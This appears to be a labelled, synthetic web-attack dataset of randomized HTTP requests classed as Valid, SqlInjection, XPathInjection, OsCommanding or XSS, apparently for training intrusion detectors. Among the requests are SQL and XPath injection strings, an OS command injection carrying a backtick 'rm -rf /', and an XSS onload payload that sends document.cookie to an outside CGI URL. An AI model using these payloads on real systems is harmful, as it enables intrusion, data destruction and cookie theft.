Content-Location: /Mxry5sb/fsieta/oake/ccteqt/elssTN.php4
Content-MD5: enVZOWlUc2RhY3Rvb3JzMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Apr 08 05:50:35 GMT
Last-Modified: Sat, 21 Oct 06 15:19:42 CET
Host: 113.104.241.124:80
Connection: keep-alive
Accept: application/zip;q=0.4, video/*, application/postscript
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: tnw-atnsi;q=0.3, etnHdad-t;q=0.9, efm-peanmo
Cache-Control: min-fresh=542
Client-ip: 75.185.90.56
Cookie: fureip0mnu=(i   <   count(sg/child::text())     and j    <    count(g8cie/child::comment())  and    k     <  count(wkdt/child::*)    )
Cookie2: $Version="33"
Date: Sun, 13 Nov 05 09:28:15 UTC
ETag: W/"AIvtFc_W-7aHz.bg-93"
Expect: ziee=5mom;eeregi=eeeeil
From: rffjOIp@Tenah9e.be
If-Modified-Since: Sun, 10 Aug 08 23:24:54 CET
If-Unmodified-Since: Mon, 31 Aug 09 23:07:41 CET
If-Match: *
If-None-Match: "xUMFg_-0cWCTStrk"
If-Range: "1s.mbu-7l6LUYMKB274d"
Max-Forwards: 8338
MIME-Version: 0.4
Pragma: sorofsoe=Vy5iei
Proxy-Authorization: Digest nc=6d2CdE8f
Authorization: aazCa telyozx=ynlswp
Range: -59071,-7
Referer: http://sye5RD.com/iInae/u5mhlh/z2eonci/sewRh.png
TE: deflate;q=0.6
User-Agent: getiewlunee6etlie
UA-CPU: Sparc
UA-OS: WinNT
UA-Color: color8
Via: e1sdea/6.0 122.234.15.150, csnyEa/4.5 www.ceLefe.css, 9.7 202.143.233.121
Transfer-Encoding: niisl; lmaxo3n=osTZaybd
Upgrade: jladt/4.0
Warning: 331 133.140.170.207 "tenopilr" "Fri, 29 Jul 05 19:30:07 GMT"
X-Forwarded-For: 117.220.135.145
X-Serial-Number: 4431106659344342
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

Cimesrvi=455&fsfs=cue&7p7evryGyems=emisoooonmiocr&nqlwoht0dLa=92692246

End - Id: 50049
Start - Id: 30551
class: Valid
GET /tHc1st-b@jfm2/w71EI5q0ezven880JTUD.png?tmpe=19&Aenbdtg=835755&angfy=q1ifN&Buuyodnewy=ueto%3Coshttpa1%40msd+2&ihmetipT=0433&Feeueenj5eaa=c%3F&Nenfea=%3DsystemAtt+namtC%3As0dFLt0&iB0trri=2280&rt6p5=863&includejovDwBZsTc=n-tdaon2er&negerese8sxonn=4706538&igiye1Oo9gmSo3=63193176 HTTP/1.0
Host: www.uptti.net
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: rs2tsLa7-pic;q=0.2
Cache-Control: no-transform
Client-ip: 43.234.64.72
Cookie: rtioodrezq=selectP
Cookie2: $Version="485"
Date: Thu, 23 Apr 09 14:29:04 CET
ETag: W/"oo8xjAmWYVg@snN"
Expect: meez
From: fulner@n7m8d5nmt.de
If-Modified-Since: Sun, 08 Aug 04 06:42:57 CET
If-Unmodified-Since: Sat, 03 Apr 04 08:47:12 UTC
If-Match: *
If-None-Match: *
If-Range: "-ljREVDxh9hqip2vY"
Max-Forwards: 6653
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Digest response="4dDf5dd21A0133e5daCaF55eCeDfea5a"
Range: 369478-
Referer: /2ifgnpgs/awecyiit.rar
TE: trailers,trailers
Trailer: Trailer
User-Agent: sBBT0SIL http://www.gfePees.uk
UA-CPU: 68000
UA-Disp: 198,315,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5611x433
Via: FTP/0.2 www.txp7nNn.tiff, HTTP/3.0 www.ns7tei.js
Transfer-Encoding: deflate
Upgrade: oro/8.8, a9o8/2.0, urC/3.4, 2oa/9.5, qDe/0.4
Warning: 671 140.154.212.102 "5oe5aeyToglnofojo" "Thu, 27 Mar 08 22:18:58 GMT"
X-Forwarded-For: 197.167.252.1
X-Serial-Number: 60141
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30551
Start - Id: 35194
class: SqlInjection
GET /edeoreetl/Cjeval.htm?zi9idtG66WS=e3erexec9w&5pun3Rvut=40624827&nhHge=isb0%40RMO&esNhaLkntrdEnr=5olm%26czeci%3F%3Fi&earmowtahlQ4=Et6as+a&iftt=dGQXck&RkEorpE3htacces01Xi=%3B++++select+++++*++from+++OPENROWSET%28+%27SQLoledb%27%2C%27uid%3Dowat%3Bpwd%3DeEbhoriiuk%3BNetwork%3DDBMSSOCN%3BAddress%3D192.125.147.50%2C30498%3B%27%2C%27select+*+++from++lr%27++%29&tWpatEUhs=fit%2BamuPr5x&cR=e&2eetd4A2itn1ai=pldEaoW&Tt6rnrn=721450&ioofhboque8d=t HTTP/1.0
Host: 197.143.255.179
Connection: keep-alive
Accept: application/*;q=0.1, application/rtf;q=0.6
Accept-Charset: iso-8859-8-i
Accept-Encoding: 
Accept-Language: bidkdN-hkrsnaia;q=0.7, uihujrAz-tegfasls;q=0.5, odon-zEgo, teiit-eshieYgr;q=0.4, t-mlreUidj
Cache-Control: no-store
Client-ip: 78.116.124.236
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="711"
Date: Thu, 20 May 04 05:34:20 CET
ETag: "HObdl7XhHCM3PbVXqLV"
Expect: 100-continue
From: htoeiec@jwecgeb0.st
If-Modified-Since: Fri, 04 Mar 05 01:21:10 GMT
If-Unmodified-Since: Tue, 15 Jan 08 01:24:54 GMT
If-Match: "VUm7f@B3lEfMzZ1"
If-None-Match: *
If-Range: Mon, 15 Jun 09 08:26:24 UTC
Max-Forwards: 959
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: 9trc 8rehoi=lhgsh5
Authorization: NTLM MWx1eHRhc2VpZWJycm53ZXRlU2lydGFvbDFhZ3RuYm90ZXRu
Range: 7416-9436,-80
Referer: /nercs/emnt/edGp9s/Lshmvh9k/fhony.cfm
TE: trailers,trailers,gzip
Trailer: Accept
User-Agent: Mozilla/8.2 (X11; U; Open BSD i386 0.0; sd-te; rv:9.0.6) Gecko/12511945
UA-CPU: StrongARM
UA-Disp: 601,1500,16
UA-Color: color32
UA-Pixels: 0990x1742
Via: FTP/5.2 33.31.52.42, 8.5 www.tdiachph.shtml, tebtFq/6.6 141.207.69.208
Transfer-Encoding: deflate
Upgrade: Iivqh/4.1, nEStsn/0.1, ocna/1.5, bea/5.8, n7i/2.7
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
X-Serial-Number: 33888894835
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35194
Start - Id: 42370
class: SqlInjection
GET /8PHBwxlbe@g/mk67sekpdwuIra/drknn6aschr5lrou/2hf@KGOT.exe?diBeiniha=ouop&nln7ijo=%27++++OR+++++%27eofsl%27++++%3D++N%27++ HTTP/1.1
Host: 34.120.160.219
Connection: heppp
Accept: */*;q=0.6
Accept-Charset: iso-2022-jp;q=0.7, x-mac-hebrew;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 9.111.68.72
Cookie: gensyeomdUned=238;on4Uith=isameoOn9%ad;ntdIr=rIz]
Cookie2: $Version="6"
Date: Sun, 27 Nov 05 23:17:40 UTC
ETag: ".pHQcBCpLNiI3Vv"
Expect: yslocn=vUdhtgTh;enre
From: orh6@rgaag.org
If-Modified-Since: Sat, 19 Mar 05 14:56:26 CET
If-Unmodified-Since: Fri, 16 Jul 04 17:44:04 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 26 Jun 08 03:53:58 GMT
Max-Forwards: 4901
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: dlmr slzlneo=pHmge92s
Authorization: Digest opaque="etieea"
Range: -966,396-333,-3990
Referer: /tFrn/ghwt5l/efso3.tar.gz
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: 4m6R2y http://www.oiid.cz
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1680x018
Via: FTP/4.4 www.9Oom.shtml, 2.3 www.ypltTcd.css:8, 1.1 217.132.25.43
Transfer-Encoding: h2e0an; l3edmih=theNo
Upgrade: Ia7/5.5, mnd/4.4, irt/6.7
Warning: 423 132.125.191.161:87 "rdoiorrnoghcct9sL6ci" 
X-Forwarded-For: 13.105.161.65
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 42370
Start - Id: 49838
class: XPathInjection
GET /sTf41wEQQv7KMJ/en6DJlXN/sk1rntne/pNr6saaaridtheb0/lsU/zsdfvnoy/adIjiddEhlr/CT0/EQG89nu1tmpd/aKkeIfS55a.-ws/wh72ty2R/httpKvEZX.tiff?uexhcoo314lau=95618++++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++++00175%3D&oaeScTensahcmeh=sbopenntm+&xOi7etfusoEso=5&rsGNwhuEh=eeqL HTTP/1.1
Host: www.tngeh.com:80
Connection: eHonti
Accept: */*
Accept-Charset: cp-936, ks_c_5601-1987;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=669
Client-ip: 77.69.248.51
Cookie: IeN6iA.openkt=055763;awiaon6silnRaO=22
Cookie2: $Version="7"
Date: Wed, 25 Feb 09 04:57:27 GMT
ETag: "cRd@wIXMwE63R.EvjfGq"
Expect: sgt9Obf=4tdadt
From: dlraatp@oeowhntmtq.org
If-Modified-Since: Sat, 16 Dec 06 07:30:04 GMT
If-Unmodified-Since: Sat, 02 Dec 06 21:21:14 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 08 Nov 06 06:35:22 CET
Max-Forwards: 737
MIME-Version: 4.3
Pragma: kiatrne='Ri'
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: Digest cnonce="lHEu2tee"
Range: -16,498057-,69-3
Referer: http://qsarnbih.ch/tsnl0e/S9kvoawt.txt
TE: trailers
Trailer: Accept
User-Agent: Mozilla/4.6 (Machintosh; U; Mac OS X 6.0; ei-oe; rv:9.8.5) Gecko/21522552
UA-CPU: Sparc
UA-Disp: 242,752,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 172x6984
Via: HTTP/2.8 www.rto5.gif, 7.3 www.emomcuu.jpg
Transfer-Encoding: gzip
Upgrade: soar/0.1
Warning: 331 www.AWev.htm "atqetujtaOta9Meosn" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 684744620
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49838
Start - Id: 497
class: Valid
GET /1D/._t@jD/dd/erbneyklalzvnse/cdzXB5G/STmnglerzoL7/-pY4ksam/a8Etpthsre/fSyrCxAVBBC8Qj7YC8M/xth7rnne0hetohoD.jsp?scMSnbdEhtne=eltdth5t7sqday&ritn1fps3m9Oeed=sta&At8uhsTOe=script%3B&ic=n3eOmyETtepexmeot HTTP/1.1
Host: www.raleiutr.cz:80
Connection: close
Accept: image/*;q=0.7, application/postscript, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 1.69.55.188
Cookie: bwe=selecteIs(ihbst0wiAn;ws0=812140;pprocessing-instructionor7copynfqqmB=bA_e3;mgdxodfnnf=mu4mV_
Cookie2: $Version="9"
Date: Sun, 11 Oct 09 18:11:09 GMT
ETag: W/"2jX3v6ODufFEfT4.U4"
Expect: 4hbnAv=e8b15;riTcolse
From: galnhlb@rtpbreUei.com
If-Modified-Since: Tue, 07 Jul 09 08:00:06 UTC
If-Unmodified-Since: Sat, 06 Mar 10 17:45:21 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 02 Mar 09 12:01:39 UTC
Max-Forwards: 1461
MIME-Version: 9.6
Pragma: c='xtutnht'
Proxy-Authorization: Basic ZW4yaWVhOm90ZFNv
Authorization: Digest response="fdd76acDc4315Bc57C3DaF1c3cd33AA6"
Range: -1,-90,0-
Referer: http://www.arm3lhae.com/e7min/rIjse/nttE/rcue6ni7/ntet51it.mdb
TE: gzip;q=0.5,gzip,chunked;q=0.7
Trailer: If-Modified-Since
User-Agent: tnskor (ifLRJujnSK; mRlu-S; 8GQq-pY; a.tZnGu; yO1m5I)
UA-CPU: StrongARM
UA-Disp: 156,7636,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2278x9542
Via: HTTP/1.8 www.is3b8s.shtml
Transfer-Encoding: ielra
Upgrade: aSogue/8.0, amz8to/3.6, rManti/2.8, samftt/0.2
Warning: 386 233.83.75.168 "ufears" 
X-Forwarded-For: 138.137.120.213
X-Serial-Number: 9170010950
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 497
Start - Id: 22446
class: Valid
GET /sT/iwah5re/4Kywo3ceOcgai2s0pp/expib_sMEYunRBpf__Bk/iOm7l0Z5LObYvO/nph-insert_/oe1dr5Swf/daBcn4qDCI/cNnleofbokx6lbte/llandS.jpeg?egay3ctSlheu7=o6ImaDe&7r7a41tqi=503&weim2ivsrChofn=a+z+%404rnamantt&5suiasgrh=%3Fkart&uiths1cp=clS60t HTTP/1.1
Host: 124.177.189.161
Connection: close
Accept: audio/x-wav
Accept-Charset: iso-8859-2, utf-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 242.133.189.214
Cookie: eqsuee=J3ewgete;wbvI-wopenScmdf@=np;vehusden87d6u=ylraoffem3;ptnnisbem1ujq=ssihhgrdzeH~;lsaso=56852
Cookie2: $Version="9"
Date: Sun, 19 Apr 09 17:20:08 UTC
ETag: "xa-zMNeKb3jW4Lg6"
Expect: 100-continue
From: ihv7ae@aqtd1l3.cz
If-Modified-Since: Mon, 27 Dec 04 07:12:46 UTC
If-Unmodified-Since: Sun, 21 Aug 05 20:14:59 UTC
If-Match: "GbFQ7OZxj4rFiIVAuKt"
If-None-Match: *
If-Range: "B_NzBqrG5.zefSjO7mi3"
Max-Forwards: 9411
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic TzNkcjpsODF0VG8=
Authorization: NTLM Um1KeWZoYXZzaWZuYW1mT3NlZWlubTllb2hmMnRhc2NhZW4=
Range: 98-111,50796-
Referer: http://ae60sa.it/wmblm/o3hedt/taxts64.txt
TE: chunked;q=0.4
Trailer: Expect
User-Agent: hhyaynviohrn
UA-CPU: Sparc
UA-Disp: 8455,3550,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 112x1566
Via: HTTP/6.4 www.npotoet.png, 9.6 92.185.95.19:12024
Transfer-Encoding: compress
Upgrade: plrEu/0.9, 0onans/5.6, irA/4.2
Warning: 775 242.150.48.252:01439 "edbeecvdNatlhToaah" "Thu, 14 Jul 05 23:57:30 CET"
X-Forwarded-For: 14.86.146.83
X-Serial-Number: 5826747890581
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 22446
Start - Id: 8335
class: Valid
GET /r_oEzPh8uLV@DATg/idsgn6dwRuWnkfr/itrgihahsnpaedcen/cxqBU48L/e79ytc_b1q/o0k5MWEcE/rjMSmXX389d87C.0Bf/t6mTn/axg4dF/iF/hGXTZGkG26GPbngru/gtj5a6asAi7Lsor.js?v7dlNt=iJ%40RUZVtHA-&soResl=iLDbtZP&ooolctautqnfu3=in&arl51tioe=sow&m4wt=ossrinsertomandb%7Eihe&keyscbtasomsops=wtQ&st80esh=aunCoDfrom0suf&lNp@d@YJoy2=rq+oc+mau%5D&enntty=01436&95ulxHu8.w=k0dcqEs%26cmd%3C&UZrEyQL=4B-D3x HTTP/1.1
Host: www.nsu5.de
Connection: ibpAe7q
Accept: image/*
Accept-Charset: gb2312;q=0.7, x-mac-arabic;q=0.3, euc-cn;q=0.4, isiri-3342, x-mac-turkish
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 170.243.98.19
Cookie: 7eloRhelrstbNyv=8797546;et=r2.eTa9@J;zhygLnsnelseoet=+-ub-;tjd0eaisSuh9oen=46109
Cookie2: $Version="3"
Date: Tue, 26 Feb 08 01:59:49 UTC
ETag: W/"WxsOQ7ADJW3AI_dzI"
Expect: sihAvs7=isLS;dal9
From: vAneoO@xoHsahh.it
If-Modified-Since: Mon, 19 Dec 05 16:26:55 UTC
If-Unmodified-Since: Tue, 06 Dec 05 24:33:47 UTC
If-Match: "xzVuca3_qO7wjd3U-BHz"
If-None-Match: *
If-Range: "pyfdY31RKZdI2r@z_lC7"
Max-Forwards: 63
MIME-Version: 9.5
Pragma: hdf5ttms='7TewrobI'
Proxy-Authorization: b5yes eadxakvc=hhuta
Authorization: Digest cnonce="cCur0s"
Range: -79
Referer: /vxwea/h3nlli/waekjets.sh
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/6.0 (Windows; U; Win 9x 3.1; cn-oh; rv:0.0.6) Gecko/95130795
UA-CPU: MIPS
UA-Disp: 7385,2765,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 253x499
Via: oah5n7/4.0 www.pteh.jpg, 8.6 www.xheeob.shtml, HTTP/7.8 11.213.129.89
Transfer-Encoding: compress
Upgrade: hnspt/1.9, hansi/5.1, lso/3.2, oyee7/4.4
Warning: 661 72.235.243.164:83255 "ieRhwa7gJbie" 
X-Forwarded-For: 217.157.80.139
X-Serial-Number: 1014850915034096
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8335
Start - Id: 13243
class: Valid
GET /765QftpJnX8/xs84dLdbsvG.O-aLSzqB/if/asU.tOy/edtEfxo/dp/kttiuH2diedvwrphiorv.asmx?tmplogVr.ZAnodeS0dw=ueaix8&8Bpiboot.iniDiIUjih=5680005659&steOenitscConEd=Ehaeo%7Cui%7C1&m53hi=meNrnol&ruieLdN=3921&0nrct00tgshoatU=6uoIvlMezf&c0thzde=6%3A&wyacunr3T6=08113&tbsrntm4rien=tl7envl&9paeiisneo=465402&yRoupdateJe=aoeep&F9nsNo1ep=insssystem1&kQZj9objectJf=20562&R1ype0iesew=leod&V.Mgy=44393242 HTTP/1.1
Host: www.frva.uk:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: windows-1252, iso-8859-6, iso-8859-8
Accept-Encoding: *
Accept-Language: ep-y;q=0.6, fbru-reaaoo
Cache-Control: no-store
Client-ip: 112.204.111.204
Cookie: hJa2qk=tei group by-d24
Cookie2: $Version="9"
Date: Sat, 18 Feb 06 02:20:02 CET
ETag: W/"is3KPRolYGtkC5GT"
Expect: 100-continue
From: jNma@wOtd.fr
If-Modified-Since: Sun, 02 Oct 05 05:10:32 CET
If-Unmodified-Since: Sat, 13 Feb 10 18:50:40 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 411
MIME-Version: 6.3
Pragma: ir='owRttt1'
Proxy-Authorization: Ooasqs dwno=ntjiba
Authorization: Basic YVRleDU6c2dvc3N1
Range: 16-5
Referer: http://teiy.gov/UE6ttstk/ctgkome/blsr4/IdiHrst/isvezok.asmx
TE: deflate,deflate
Trailer: Pragma
User-Agent: Mozilla/4.4 (Machintosh; U; PPC Mac OS X 9.7; hu-6c; rv:4.5.0) Gecko/65400709
UA-CPU: MIPS
UA-Disp: 2503,069,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2344x540
Via: HTTP/3.6 115.167.156.91, HTTP/4.5 www.rifmdn.html, 0.0 65.93.133.204
Transfer-Encoding: compress
Upgrade: cdmd/1.3, tr0h/8.6, nesh/6.4, qnH/1.5, naAil/7.8
Warning: 198 157.148.141.227 "pngahiabduinT" 
X-Forwarded-For: 137.114.108.160
X-Serial-Number: 4810868204268
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13243
Start - Id: 43497
class: OsCommanding
GET /oWynWS7Vyb96yTSPu/enge3NV_jaaHeJ/eei/wbTFvH/oe.P8upFLGaq3t/37TI/Rzte7xtahucosx.mdb?aqN9like9p8=%60++++rm+++-rf++++%2F+++%60&eoi2wanteddchp=52122022 HTTP/1.0
Host: 52.105.13.227
Connection: keep-alive
Accept: text/plain, application/*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 43.152.7.162
Cookie: tlm=hs0aCroephpunbaservices;licbo=execos+<ss;0actacceptld;edsDwnl=46;ttpsr5Im=2laitn9e;ohlktcuoaqbeac=wonefH88privoBw;moesoecihzch=opcspq0eitczoi402
Cookie2: $Version="514"
Date: Mon, 08 May 06 17:02:04 CET
ETag: W/"uhZCKDWcmyXWFNL"
Expect: reNwssAo=Iiubo;seruenh=eiwamf
From: fxtr5UaD@nYeuiAuhet.net
If-Modified-Since: Wed, 14 Jan 09 08:42:47 CET
If-Unmodified-Since: Fri, 12 Jun 09 08:20:36 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1573
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM b2NpT2hvcW1vN2ljcXB0Z25oZXNzbUVvN2Vpc2FFcmRBc2RuaFQ=
Authorization: Basic NTJldzpibHZ5aGw0
Range: 32-61,4386-85
Referer: /sfiuaA/RihNU44l/eoohalhb/ai7w/7geyMnna.pl
TE: trailers
Trailer: Referer
User-Agent: sWU4qlZ3- http://www.adgomhv.be
UA-CPU: MIPS
UA-Disp: 777,376,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2941x889
Via: 5.8 33.148.210.176
Transfer-Encoding: compress
Upgrade: trzhel/9.1, tsfae/2.2
Warning: 030 157.207.32.92 "imad6oletnEdRcinytly" "Thu, 14 Apr 05 13:21:07 CET"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 521013041943
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43497
Start - Id: 1322
class: Valid
GET /rOc@Uga/lcJrJ49hb3FTHw@QuDZ/n@T2lXMR_/hLeswtub4d.msf?a4plog=u5EB--QwAh&rnUd=e_dYeZO-&nhozacnd7T=twindow.openeps7aE&dceteoabokniik=88&eaDrumeGgbmet0g=7mat4&wsso9su=359623&tabtk9aujrnl=bfGhfeeoia3sfLmS&stb=lostnidcirdiet&wRGmu4eeieaaEm=7&AT4aKRhlinkjH=hhee6aykcsho HTTP/1.1
Host: www.aheuraay.org:15064
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 2lgM-eb, qvnrrohd-sfGtew, wrhdsUnn-dx;q=0.6, emj-thtteina;q=0.4
Cache-Control: max-stale=541
Client-ip: 58.67.184.51
Cookie: rwEky=437187;trEieeag6fesgOa=sNS;4e=seuze;oi8orv=9ls)ain  wtoyh;Jupdate-0dhtpassb-=je/;htqojehef=acrw1D
Cookie2: $Version="16"
Date: Tue, 20 Jan 04 03:54:25 GMT
ETag: "cdzAjY0NJ4jEVrTNe"
Expect: 100-continue
From: strldbE@9qmhittm.gov
If-Modified-Since: Tue, 23 Mar 04 01:44:14 GMT
If-Unmodified-Since: Thu, 15 Jan 09 10:25:06 UTC
If-Match: "nm3vm9xdMqFqhSC36KB"
If-None-Match: "of_XpcshRNOdr5qOX98"
If-Range: *
Max-Forwards: 655
MIME-Version: 4.4
Pragma: en='4e'
Proxy-Authorization: e9vjnk aure=ntiF
Authorization: os0tte Hhcl=l6orCcng
Range: -216
Referer: http://www.dyteles.biz/otFsIatn.php3
TE: chunked,trailers,chunked;q=0.5
Trailer: Accept-Language
User-Agent: nJrK02 http://www.br3ah.gov
UA-CPU: Sparc
UA-Disp: 512,7635,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 290x591
Via: icv/7.7 190.61.29.93, HTTP/8.7 8.138.127.117, 1.4 www.mt3e.jpeg
Transfer-Encoding: esnisF
Upgrade: t7rs/3.9, wsOC/1.9, elcLbb/7.5, yutxee/3.6, sz6enA/6.2
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 6191285179418731
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1322
Start - Id: 46763
class: XSS
POST /o.Cz4QBdsi3w/lxHZmacSMUYshsO/sHY9@8Bjdo/iaa/tbdts/3ZAS16AdkQ/vah1tsnae1l2lo.shtml? HTTP/1.0
Content-Length: 325
Content-Language: w9io8h7r,edlgeaer,fslu
Content-Encoding: gzip
Content-Location: /aSeo/tanioq/rs1neh/unel/Cgs3.aspx
Content-MD5: c2l0dmVkM3RxbHJ1c2VhbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 29 Aug 09 17:16:15 CET
Last-Modified: Mon, 04 Jan 10 24:32:48 CET
Host: www.natn05.ch:80
Connection: keep-alive
Accept: text/*;q=0.1
Accept-Charset: windows-1257;q=0.3, x-mac-turkish, iso-2022-kr, windows-1253;q=0.9, hz-gb-2312
Accept-Encoding: deflate;q=0.4, deflate;q=0.2
Accept-Language: eoWe8-dadEctd
Cache-Control: no-cache
Client-ip: 202.152.82.23
Cookie2: $Version="609"
Date: Sat, 04 Sep 04 15:25:55 GMT
ETag: "uvWwqLBwApGZcIhP"
Expect: 100-continue
If-Modified-Since: Thu, 31 May 07 21:50:24 GMT
If-Unmodified-Since: Wed, 04 Mar 09 15:16:27 CET
If-Match: *
If-None-Match: "SR@YflsFIEMGg2pm"
If-Range: *
Max-Forwards: 3
Pragma: no-cache
Proxy-Authorization: Basic Z212dGU6ZXJyZWRkZQ==
Referer: /e4Egwn.bin
TE: gzip;q=0.8,trailers,gzip
User-Agent: Mozilla/7.0 (Machintosh; U; PPC 8.9; 1a-3g; rv:0.1.9) Gecko/06069979
UA-Color: color32
UA-Pixels: 1199x1516
Transfer-Encoding: deflate
Warning: 169 130.84.60.97 "veojxxdsnqtnotxti" "Sat, 18 Mar 06 20:44:29 GMT"

hCoifszi2M=n3nq  no7apsEI/croe&r&1QPadminhXFKJ0aF1=dlntNmsbweqtmpn0sa&pntaa7=wGRm0z&ztorc=3&cyNzNi=833&hgtinopt=<body     onload  =  "     [document.location.replace ('http://www.maonerin.com/cgi-bin/nisttoit.cgi'+document.cookie);]     "  >&6o3n=8275&omn=nralTe+ElnrnLzpasswd(;0

End - Id: 46763
Start - Id: 48861
class: XPathInjection
GET /pahch/9yd/9rehxnee/UopenKCo_17AFvarB2Q.asp?@yOYINS=2+++or++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+99937%3D&cpa=uOiro&eOssa6=bieru&ee1=yaKOJa HTTP/1.1
Host: www.mb6d.st
Connection: close
Accept: application/*, application/x-tar;q=0.2
Accept-Charset: big5, iso-8859-9;q=0.2
Accept-Encoding: 
Accept-Language: ialskph-n, 1uz9a0-mts9no, t-56waml;q=0.4, e-in
Cache-Control: only-if-cached
Client-ip: 107.196.0.55
Cookie: 0mRsevgdttraAg=yBgC5vz;OucaEn9xMtshutdownn=47;Zi5xHF=2;he2=1;betdCH=nrsSVF1.
Cookie2: $Version="26"
Date: Thu, 29 Mar 07 18:12:07 GMT
ETag: "_fRV_D@7oKn-qsK"
Expect: akafu79
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Sat, 26 Sep 09 23:13:43 GMT
If-Unmodified-Since: Thu, 11 Nov 04 21:22:43 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 01 Sep 04 11:44:57 CET
Max-Forwards: 75
MIME-Version: 4.5
Pragma: s9l=yl7ph
Proxy-Authorization: sies2t issr=m6mr
Authorization: Basic VGVUMVdlczM6b2FmaWJlbXA=
Range: 572-841,573-
Referer: /af7lh08l/mppta/cdrufym.txt
TE: chunked;q=0.7,chunked,gzip;q=0.0
Trailer: Accept-Charset
User-Agent: ol1ozi94tn (hHBKSyYA; caCoBD; afnvJ4mB_; a5bl5V)
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: 5.6 www.f5iV4.tiff, 9n6/8.5 70.204.245.100
Transfer-Encoding: REal; iHyshvu=aoilttln
Upgrade: wrmk/0.8, tyuf/8.4, rih/4.1
Warning: 031 102.38.172.102 "nisa2e2yv" 
X-Forwarded-For: 156.103.50.172
X-Serial-Number: 6876836791453
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48861
Start - Id: 17126
class: Valid
GET /vwsystemBdocumentiqrmchxtermC/lt7n8ie/JmUiEEb9VG7imgL/dntaIsmvuaion/ev_PW7HFIf34zwRo2/ds04rZ/w5Achddoeel.htm?erqntai=14209241&iGhg68Irqe7l=6751&thBh5afi=waegsricVAaimis%3Fu&erei2meHiEn1=tcl&59=mAzlgiwnt%7Cittme HTTP/1.1
Host: 65.81.154.36
Connection: close
Accept: image/gif, video/*;q=0.6
Accept-Charset: x-mac-greek;q=0.5, euc-kr;q=0.3, windows-1254
Accept-Encoding: compress;q=0.4
